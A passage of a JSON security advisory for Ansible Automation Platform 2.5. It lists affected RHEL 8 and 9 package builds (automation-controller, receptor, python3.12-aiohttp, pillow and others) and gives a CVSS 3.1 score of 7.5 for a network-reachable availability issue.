"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
